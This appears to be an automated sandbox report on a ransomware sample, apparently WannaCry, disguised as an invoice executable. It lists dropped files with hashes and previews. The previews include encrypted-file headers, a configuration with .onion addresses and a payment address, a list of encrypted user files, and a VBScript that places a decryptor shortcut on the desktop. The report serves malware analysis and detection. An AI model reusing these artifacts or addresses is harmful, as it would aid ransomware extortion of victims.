                                                          SHA-256:6B9A5C8CFC26DFCB8BCFFACC99B0C71206DDDC62C1BD3780C936B3D353BF95EA
                                                          SHA-512:F96EBAB960785F721391232FCEF9C0EDA5988C1394D461112F8AE17A2DCECE521664454B219A5E5759460E377F17DD86D1F52008CCB670200B93A66BE9B6303B
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......]Dn.-..c.-.>......u&YC.._...w[...I..d..%...mu+...q!Fw...h~"....;.n...........U;..u~.z..fO....E.].$v......E~f.T...2.d...-&_...q....\.*.Q..f.,_@.T..S..jWE..b.W..].....-4y.RTyA..Y.JYN.c>.>.p.\E.)%q~}.x..v.?.b}!.r..BAo%......Ac.;x.]..d.%..I,u.O.m....................Fy. ..x.;?.B'..........w.........>..o..V....$..%t.....hM_.....d..#..Z....{.u........o..k...=..H.b2.............qu.,...p.}.hrZ.`.w..(..n>.9.+.[...5.$......z..Y..|.i.LZM...h}......j.oI<.;.Q.%.x...e]......{J.#.My.w..7.....Q..Ko..sX..o..u......g.a.;>..B.Y..;.Gx....^.S\...z..`.........VO..b.t.3....7..Wy.....8....Q.T.{....p..V.*...A......r.4)....jZ.j....`...i...Ba..@..B....|.ET4/... #..fnc...I@....t.....E.Oa....5]...Y......MI........_........@../.....z..=.L.L^9...#%.....Rg...LP....bZW.:.u.K....|...Gh.....d...R.I.....Q. .z...w........k.z.../...^..i...........u..[L..8.|...X......|.1).......nP...qP.}... m..]8...L-.Z.:..".6.(..<..@HyYG.f.9.5........2:...m..*.,...Q9[.. ..\NW.^....)..
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.795629897227125
                                                          Encrypted:false
                                                          SSDEEP:24:mBPuSe4xfImfpD8KUkTqjlrQZQGYeefH4y/j8stblt3Z9tsa:GE4xfImfpDJDslEZxYecH4tiblpTma
                                                          MD5:01930BD93418A4F570282A35A2818A69
                                                          SHA1:F18EFD623DC4CCF8A012F6C80D7DC364CF90A93E
                                                          SHA-256:07B804492A590F59B714B471FC5264752FE6299B1CBEC1AC8D8C7292EA9E98FE
                                                          SHA-512:8BD03432726B339FC6E31F084D2A72381D9C3EE45785E5796290C43AD310E8D34526627EBA53ED1C4519B14D6D73FF70928DFFAE158FA29F2D0D9F83C6867BBD
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.82510156739861
                                                          Encrypted:false
                                                          SSDEEP:24:bkFxwucKFX7r5eJK//W32BBga9eDjh1NdJ4O+tKNsauKYaiN2LK+7s49ZFwFT5js:bkYNKFX7B//796vNzp+tKNdLK+Y493wg
                                                          MD5:805F36E9ADD678E808AA7283A428B43D
                                                          SHA1:FFE417169A11671695D4C52FB8F1246AE8B133BB
                                                          SHA-256:1C966DC5927700C48CD5277C028619F469EABE33351AB9EE5F740E773CFD3F48
                                                          SHA-512:68CC8D0735C0538D6408B818F31E826957B1D25B92ACF78AC37E21E90B0CFCD080704404A2CB6258C77370307D80A6533A85F5C635279C6369241226057E69C9
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....:n..vN..:v^....*HQI.p[?.{.5._........2.~G..f...V...K.H..e..!X.g(..8.k.o.c...A...]...5R...*}klP...y.a....9t.....H..s..;w.As\*.9..be.1.A.4...(..L..}..<...?c.......5.....H....*pc.`j..8.<N....G..=UT.kH.!tq....ge{..V8H.KA...}...7T...".O.<...@...D.............H..,..7.{`l.".....<..}wA%.xr..v.....=z".."....Kp..&S...A.,.. Q.."0.G...ag...7.T/L..J0.6.{P.L..s.|........g.,....l..1.$2..*ps....?p..%iB...w.a..4.r.#..Uj...'2X.W.....n.....rQl.U2.9l.C4..!....F.H.M...nGp~a.f.....$(...[23...............(...{.bI.,....H?!`K..W.t"....I1.....~..w.jL...YM..2|..Q#...d..].V.>.D.I.`.j]...%5..9..7..c6.7*..d..rN.....n.fE...^(...[.y....U.{.Wu...^.I..U.....F.........{....$.,..Z.)p..vj#...R...~...-.]..E...V`it._..w..Xe...".Z..+......v....q.m......QG..2.>]...vJ.~.....T1..w.v...DY-.?.".5c{..`.38....f.B.?..T.....~`q.Qg...K2..3...p...G...~c#...6..S.t..$...|......i.m.N....B.-!......._..X.....`..0.._...%. l".K..-...}X.(;.%!...b.7kuq..H+..'m..9..eo.O.^......Uwz
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:PC bitmap, Windows 3.x format, 800 x 600 x 24, image size 1440000, resolution 3779 x 3779 px/m, cbSize 1440054, bits offset 54
                                                          Category:dropped
                                                          Size (bytes):1440054
                                                          Entropy (8bit):0.3363393123555661
                                                          Encrypted:false
                                                          SSDEEP:384:zYzuP4tiuOub2WuzvqOFgjexqO5XgYWTIWv/+:sbL+
                                                          MD5:C17170262312F3BE7027BC2CA825BF0C
                                                          SHA1:F19ECEDA82973239A1FDC5826BCE7691E5DCB4FB
                                                          SHA-256:D5E0E8694DDC0548D8E6B87C83D50F4AB85C1DEBADB106D6A6A794C3E746F4FA
                                                          SHA-512:C6160FD03AD659C8DD9CF2A83F9FDCD34F2DB4F8F27F33C5AFD52ACED49DFA9CE4909211C221A0479DBBB6E6C985385557C495FC04D3400FF21A0FBBAE42EE7C
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):780
                                                          Entropy (8bit):2.3807439998647064
                                                          Encrypted:false
                                                          SSDEEP:6:cDm+IQoKvbHaHqHgVcKKfF9mHRMMPRGS37LlN/sUQqGUSGeTsdEC:cjdHaRVcKKfm2MYS3sUQqGLGeTEV
                                                          MD5:8B490F01C03DEE874EA23771FE77ADC1
                                                          SHA1:8ACCBC3670FED62C5BA994FCCCF55631A4ED40A1
                                                          SHA-256:AE4E63BCADE6440D35D1E480C0A4F401DCCB405C3480B9E71EC360863B39465B
                                                          SHA-512:64E788B7FFD903E43BE1DB1EB9BAD7D13DB99294398EC0DA0EDA1B45A4259E09963BB6FFEFD9609F2AD35BC4A819525C6C46A6ECC22A823867FFBC4216C47627
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:............................................................................................................0r.e...........C......................................................12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw................gx7ekbenv2riucmf.onion;57g7spgrzlojinas.onion;xxlvbrloxvriy2c5.onion;76jdd2ir2embyv47.onion;cwwnhwhlz52maqm7.onion;.......................................................................................................................................https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip...........................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):835
                                                          Entropy (8bit):5.338989222040054
                                                          Encrypted:false
                                                          SSDEEP:24:okTGIUb+OF8kU5KkR2NYeb+BLHUb+OFJ5Kk0Ggh4ANUb+O6:okTGIUb1WkUUkMDb+B7Ub1zUk3gh4MUQ
                                                          MD5:8038CCF5E7F61685688327AA1A0F92A5
                                                          SHA1:0D99C391F3B7B54D84F5ACFB5BDB2B3175163274
                                                          SHA-256:C71B6FE02AE8CAA14B7154087968BC77D0DF7924461453D461CE68539E15C642
                                                          SHA-512:5B58351A4FAAFD1194B1F93AB93C35DC9E12128A4579551030D3387A7FB4AEBB19963B70336202E4BB7F4DF6303920A152D581F87CD14D1EC71E320043D8EA76
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:C:\Users\user\Documents\LIJDSFKJZG\QFAPOWPAFG.mp3.WNCRY..C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410577537420123.txt.WNCRY..C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons\48.png.WNCRY..C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\wallet.bundle.js.WNCRY..C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\GLEAM-DARK.svg.WNCRY..C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\icon_16.png.WNCRY..C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\7TU8ICAJ\trans[2].gif.WNCRY..
                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):195
                                                          Entropy (8bit):4.9828343133437905
                                                          Encrypted:false
                                                          SSDEEP:3:gponhvDCKFcsDT6MWlynJ96JS2x9rbPT6MWlynJSK2Fvn:e+hvbGoJgJSoPGoJSK2Fv
                                                          MD5:CF54CCA4CEA475C005EEE306DF7C73D0
                                                          SHA1:1D1A669F4376CBB22A5C5C8D211A352AF84DC95D
                                                          SHA-256:580B3C23A6578CDA3DC3349F3749E935BABC6FA6F2CE9B8DC58D7463C0F618A9
                                                          SHA-512:043F8938BA7CB4F8BBF3E77667E6505271A984578869623102CF8D61A3D9162387DC200F1F8BF97DF5BEE621B0E952DD9F672150777AA18C978E1B95F3B452AE
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:SET ow = WScript.CreateObject("WScript.Shell")..SET om = ow.CreateShortcut("C:\Users\user\Desktop\@WanaDecryptor@.exe.lnk")..om.TargetPath = "C:\Users\user\Desktop\@WanaDecryptor@.exe"..om.Save..
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                          Category:dropped
                                                          Size (bytes):47879
                                                          Entropy (8bit):4.950611667526586
                                                          Encrypted:false
                                                          SSDEEP:768:Shef3jHdCG28Eb1tyci8crbEw6/5+3xFkbP0vyzbZrS14e:SheU5De
                                                          MD5:95673B0F968C0F55B32204361940D184
                                                          SHA1:81E427D15A1A826B93E91C3D2FA65221C8CA9CFF
                                                          SHA-256:40B37E7B80CF678D7DD302AAF41B88135ADE6DDF44D89BDBA19CF171564444BD
                                                          SHA-512:7601F1883EDBB4150A9DC17084012323B3BFA66F6D19D3D0355CF82B6A1C9DCE475D758DA18B6D17A8B321BF6FCA20915224DBAEDCB3F4D16ABFAF7A5FC21B92
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                          Category:dropped
                                                          Size (bytes):54359
                                                          Entropy (8bit):5.015093444540877
                                                          Encrypted:false
                                                          SSDEEP:768:SWjkSFwwlUdcUG2HAmDTzpXtgmDNQ8qD7DHDqMtgDdLDMaDoKMGzD0DWJQ8/QoZ4:SWcwiqDB
                                                          MD5:0252D45CA21C8E43C9742285C48E91AD
                                                          SHA1:5C14551D2736EEF3A1C1970CC492206E531703C1
                                                          SHA-256:845D0E178AEEBD6C7E2A2E9697B2BF6CF02028C50C288B3BA88FE2918EA2834A
                                                          SHA-512:1BFCF6C0E7C977D777F12BD20AC347630999C4D99BD706B40DE7FF8F2F52E02560D68093142CC93722095657807A1480CE3FB6A2E000C488550548C497998755
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f12\fbidi \froman\fcharset129\fprq2{\*\panose 02030600000101010101}\'b9\'d9\'c5\'c1{\*\falt Batang};}{\f18\fbidi \fmodern\fcharset136\fprq1{\*\panose 02020509000000000000}MingLiU{\*\falt 2OcuAe};}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\f44\fbidi \froman\fcharset129\fprq2{\*\panose 02030600000101010101}@\'b9\'d9\'c5\'c1;}..{\f45\fbidi \fmodern\fcharset136\fprq1{\*\panose 02020509000000000000}@MingLiU;}{\f53\fbidi \fmodern\fcharset129\fprq1{\*\panose 020b0609000101010101}\'b1\'bc\'b8\'b2\'c3\'bc;}..{\f54\fbidi \fmodern\fchar
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                          Category:dropped
                                                          Size (bytes):79346
                                                          Entropy (8bit):4.901891087442577
                                                          Encrypted:false
                                                          SSDEEP:768:SDwtkzjHdLG2xN1fyvnywUKB5lylYlzlJpsbuEWeM/yDRu9uCuwyInIwDOHEhm/v:SDnz5Rt4D4
                                                          MD5:2EFC3690D67CD073A9406A25005F7CEA
                                                          SHA1:52C07F98870EABACE6EC370B7EB562751E8067E9
                                                          SHA-256:5C7F6AD1EC4BC2C8E2C9C126633215DABA7DE731AC8B12BE10CA157417C97F3A
                                                          SHA-512:0766C58E64D9CDA5328E00B86F8482316E944AA2C26523A3C37289E22C34BE4B70937033BEBDB217F675E40DB9FECDCE0A0D516F9065A170E28286C2D218487C
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f11\fbidi \fmodern\fcharset128\fprq1{\*\panose 02020609040205080304}MS Mincho{\*\falt ?l?r ??\'81\'66c};}{\f12\fbidi \froman\fcharset129\fprq2{\*\panose 02030600000101010101}\'b9\'d9\'c5\'c1{\*\falt Batang};}..{\f18\fbidi \fmodern\fcharset136\fprq1{\*\panose 02020509000000000000}MingLiU{\*\falt 2OcuAe};}{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}..{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                          Category:dropped
                                                          Size (bytes):39070
                                                          Entropy (8bit):5.03796878472628
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                          Category:dropped
                                                          Size (bytes):40512
                                                          Entropy (8bit):5.035949134693175
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                          Category:dropped
                                                          Size (bytes):37045
                                                          Entropy (8bit):5.028683023706024
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                          Category:dropped
                                                          Size (bytes):36987
                                                          Entropy (8bit):5.036160205965849
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                          Category:dropped
                                                          Size (bytes):36973
                                                          Entropy (8bit):5.040611616416892
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                          Category:dropped
                                                          Size (bytes):37580
                                                          Entropy (8bit):5.0458193216786
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                          Category:dropped
                                                          Size (bytes):38377
                                                          Entropy (8bit):5.030938473355282
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                          Category:dropped
                                                          Size (bytes):38437
                                                          Entropy (8bit):5.031126676607223
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                          Category:dropped
                                                          Size (bytes):37181
                                                          Entropy (8bit):5.039739267952546
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                          Category:dropped
                                                          Size (bytes):49044
                                                          Entropy (8bit):4.910095634621579
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                          Category:dropped
                                                          Size (bytes):37196
                                                          Entropy (8bit):5.039268541932758
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                          Category:dropped
                                                          Size (bytes):36883
                                                          Entropy (8bit):5.028048191734335
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                          Category:dropped
                                                          Size (bytes):81844
                                                          Entropy (8bit):4.85025787009624
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                          Category:dropped
                                                          Size (bytes):91501
                                                          Entropy (8bit):4.841830504507431
                                                          Encrypted:false
                                                          SSDEEP:768:Shef3jHdUG2NQcbxfSVZiG9jvi3//ZVrMQr7pEKCHSI2DsY78piTDtTa6BxzBwdY:SheiaDq
                                                          MD5:6735CB43FE44832B061EEB3F5956B099
                                                          SHA1:D636DAF64D524F81367EA92FDAFA3726C909BEE1
                                                          SHA-256:552AA0F82F37C9601114974228D4FC54F7434FE3AE7A276EF1AE98A0F608F1D0
                                                          SHA-512:60272801909DBBA21578B22C49F6B0BA8CD0070F116476FF35B3AC8347B987790E4CC0334724244C4B13415A246E77A577230029E4561AE6F04A598C3F536C7E
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                          Category:dropped
                                                          Size (bytes):41169
                                                          Entropy (8bit):5.030695296195755
                                                          Encrypted:false
                                                          SSDEEP:384:SheftipUENLFsPzy3EFHjHdcqH24G2ZN1EDCv3Apb0WD5gYV/S4L3rnzdeo75Y3f:Shef3jHdcMG2NpZrS14F
                                                          MD5:C33AFB4ECC04EE1BCC6975BEA49ABE40
                                                          SHA1:FBEA4F170507CDE02B839527EF50B7EC74B4821F
                                                          SHA-256:A0356696877F2D94D645AE2DF6CE6B370BD5C0D6DB3D36DEF44E714525DE0536
                                                          SHA-512:0D435F0836F61A5FF55B78C02FA47B191E5807A79D8A6E991F3115743DF2141B3DB42BA8BDAD9AD259E12F5800828E9E72D7C94A6A5259312A447D669B03EC44
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                          Category:dropped
                                                          Size (bytes):37577
                                                          Entropy (8bit):5.025836823617116
                                                          Encrypted:false
                                                          SSDEEP:384:SheftipUENLFsPzy3EFHjHdy2MG2D7mgwroXeo75Y3kmA31dv61Qy5:Shef3jHdGG23KrDZrS14N
                                                          MD5:FF70CC7C00951084175D12128CE02399
                                                          SHA1:75AD3B1AD4FB14813882D88E952208C648F1FD18
                                                          SHA-256:CB5DA96B3DFCF4394713623DBF3831B2A0B8BE63987F563E1C32EDEB74CB6C3A
                                                          SHA-512:F01DF3256D49325E5EC49FD265AA3F176020C8FFEC60EB1D828C75A3FA18FF8634E1DE824D77DFDD833768ACFF1F547303104620C70066A2708654A07EF22E19
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                          Category:dropped
                                                          Size (bytes):39896
                                                          Entropy (8bit):5.048541002474746
                                                          Encrypted:false
                                                          SSDEEP:384:SheftipUENLFsPzy3EFHjHdD2SG2gA8w8OJ6868jy8/8w8m8T848f8y858l8j8yv:Shef3jHdxG2KhuZrS14G
                                                          MD5:E79D7F2833A9C2E2553C7FE04A1B63F4
                                                          SHA1:3D9F56D2381B8FE16042AA7C4FEB1B33F2BAEBFF
                                                          SHA-256:519AD66009A6C127400C6C09E079903223BD82ECC18AD71B8E5CD79F5F9C053E
                                                          SHA-512:E0159C753491CAC7606A7250F332E87BC6B14876BC7A1CF5625FA56AB4F09C485F7B231DD52E4FF0F5F3C29862AFB1124C0EFD0741613EB97A83CBE2668AF5DE
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                          Category:dropped
                                                          Size (bytes):37917
                                                          Entropy (8bit):5.027872281764284
                                                          Encrypted:false
                                                          SSDEEP:384:SheftipUENLFsPzy3EFHjHdy2QG2xgk5eo75Y3kmA31dv61QyV:Shef3jHdCG2EZrS14p
                                                          MD5:FA948F7D8DFB21CEDDD6794F2D56B44F
                                                          SHA1:CA915FBE020CAA88DD776D89632D7866F660FC7A
                                                          SHA-256:BD9F4B3AEDF4F81F37EC0A028AABCB0E9A900E6B4DE04E9271C8DB81432E2A66
                                                          SHA-512:0D211BFB0AE953081DCA00CD07F8C908C174FD6C47A8001FADC614203F0E55D9FBB7FA9B87C735D57101341AB36AF443918EE00737ED4C19ACE0A2B85497F41A
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                          Category:dropped
                                                          Size (bytes):52161
                                                          Entropy (8bit):4.964306949910696
                                                          Encrypted:false
                                                          SSDEEP:768:Shef3jHdXG2Cz2/vBAOZsQO0cLfnF/Zhcz7sDsYZBB/0gBjL+IU/hbhMVDtsR49P:ShehlrGR1m4dx9mjVyAvg7ouDT
                                                          MD5:313E0ECECD24F4FA1504118A11BC7986
                                                          SHA1:E1B9AE804C7FB1D27F39DB18DC0647BB04E75E9D
                                                          SHA-256:70C0F32ED379AE899E5AC975E20BBBACD295CF7CD50C36174D2602420C770AC1
                                                          SHA-512:C7500363C61BAF8B77FCE796D750F8F5E6886FF0A10F81C3240EA3AD4E5F101B597490DEA8AB6BD9193457D35D8FD579FCE1B88A1C8D85EBE96C66D909630730
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                          Category:dropped
                                                          Size (bytes):47108
                                                          Entropy (8bit):4.952777691675008
                                                          Encrypted:false
                                                          SSDEEP:384:SheftipUENLFsPzy3EFHjHdg2qG2aUGs0K6lyZqmfGGHRblldORZeo75Y3kmA31L:Shef3jHdeG2lGsDOcZxbP7ZrS14K
                                                          MD5:452615DB2336D60AF7E2057481E4CAB5
                                                          SHA1:442E31F6556B3D7DE6EB85FBAC3D2957B7F5EAC6
                                                          SHA-256:02932052FAFE97E6ACAAF9F391738A3A826F5434B1A013ABBFA7A6C1ADE1E078
                                                          SHA-512:7613DC329ABE7A3F32164C9A6B660F209A84B774AB9C008BF6503C76255B30EA9A743A6DC49A8DE8DF0BCB9AEA5A33F7408BA27848D9562583FF51991910911F
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                          Category:dropped
                                                          Size (bytes):41391
                                                          Entropy (8bit):5.027730966276624
                                                          Encrypted:false
                                                          SSDEEP:384:SheftipUENLFsPzy3EFHjHd4Yb2YG2gNZ8a8zV/8j8U8l8x838Z8Q808m8d8T8hw:Shef3jHdZvG23AZrS14f
                                                          MD5:C911ABA4AB1DA6C28CF86338AB2AB6CC
                                                          SHA1:FEE0FD58B8EFE76077620D8ABC7500DBFEF7C5B0
                                                          SHA-256:E64178E339C8E10EAC17A236A67B892D0447EB67B1DCD149763DAD6FD9F72729
                                                          SHA-512:3491ED285A091A123A1A6D61AAFBB8D5621CCC9E045A237A2F9C2CF6049E7420EB96EF30FDCEA856B50454436E2EC468770F8D585752D73FAFD676C4EF5E800A
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                          Category:dropped
                                                          Size (bytes):37381
                                                          Entropy (8bit):5.02443306661187
                                                          Encrypted:false
                                                          SSDEEP:384:SheftipUENLFsPzy3EFHjHdf24G2/ezV6YQUdZYlujeMQ9RXmhRweo75Y3kmA31S:Shef3jHdrG2fuhZrS14T
                                                          MD5:8D61648D34CBA8AE9D1E2A219019ADD1
                                                          SHA1:2091E42FC17A0CC2F235650F7AAD87ABF8BA22C2
                                                          SHA-256:72F20024B2F69B45A1391F0A6474E9F6349625CE329F5444AEC7401FE31F8DE1
                                                          SHA-512:68489C33BA89EDFE2E3AEBAACF8EF848D2EA88DCBEF9609C258662605E02D12CFA4FFDC1D266FC5878488E296D2848B2CB0BBD45F1E86EF959BAB6162D284079
                                                          Malicious:false
                                                          Reputation:unknown
